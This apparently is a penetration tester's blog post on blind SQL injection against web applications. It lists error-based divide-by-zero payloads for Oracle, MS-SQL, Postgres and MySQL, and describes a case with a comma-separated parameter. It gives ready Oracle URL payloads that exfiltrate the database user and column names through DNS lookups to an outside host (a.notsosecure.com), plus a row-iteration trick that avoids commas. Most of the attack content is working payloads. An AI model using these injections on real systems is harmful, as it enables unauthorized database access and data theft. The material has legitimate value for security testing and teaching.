www.notsosecure.com

Occasionally when exploiting SQL injections there are conditions when application does not show different pages for true and false result of sql query. If the database server does not resolve host names(thus prohibiting out of band attacks), the attack vector that is used to exploit such conditions is to use functions such as 'waitfor delay' which makes database sleep for specified seconds. Thus a true condition will return the output with a time delay whereas a false condition will result in prompt response.

In some cases application returns different output(or error) if the syntax of the SQL query is wrong. In these conditions instead of carrying out time based attacks one could use the if statements to manipulate the sql query.

The following query will return a divide by zero error when the condition is true:-

Oracle:-

select case when user='SYS' then 1/0 else (select 1 from dual) end from dual 

MS-SQL :-

if ((select user) = 'sa' OR (select user) = 'dbo') select 1/0 else select 1 

update:- select case when( 1=1) then 1 else 1/0 end  

POSTGRES :-

SELECT CASE WHEN (1=2) THEN 1 ELSE 1/0 END;

update:-case when (1=1) then 1 else (1 * (select 1 from information_schema.tables)) end)=1 

MY-SQL:- 

Doesn't work. Careful, there is a IF query handling Denial OF service which kills the database in old versions. 

update:- select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1 

returns error 'multiple rows returned by subquery'  when the condition is false 

— 

Thanks pentestmonkey for providing some useful queries 

– 

Recently i came across a SQL Injection against oracle database, where the vulnerable parameter was taking comma separated input.

Thus Valid input will look like:- index.do?id=1,200

And it was easier to confirm that its vulnerable to sql injection by making true and false responses:-

True response:- index.do?id=1,200 and 1=1

False Response:- index.do?id=1,200 and 1=2

This way i could carry out the bind sql injection, but then i tried to get data through out of band channeling  and that worked too:-

example:-index.php?id=1,200+and(SELECT+UTL_INADDR.get_host_address(

(SELECT+user+from+dual)||'.a.notsosecure.com')+FROM+dual)+is+not+null

However, the problem arrived when i had to get data by iterating through rows. In order, to iterate through rows i use the following syntax:-

SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9;

But As this application was taking comma separated values, this comma resulted in my query being structured in some other way and the application returned error.

A solution to this is to use the query like:-

index.php?id=1,200+and(SELECT+UTL_INADDR.get_host_address(

(SELECT+column_name+from+all_tab_columns+where+rownum<2+and+

column_name+not+in

(select+column_name+from+all_tab_columns where+rownum<4 ))||

'.a.notsosecure.com')+FROM+dual)+is+not+null

By increasing the rownum number (in bold) iteration could be achieved. However, as this number increases the backend queries become more and more cpu intensive. I still could not do union select query as the original query select more than one column and i could not figure out a way to do union select without entering comma.

—-
A good resource for pentesting oracle Application server can be found here:-

Oracle Application Scanner(OAPscan) is also a very handy tool. 

—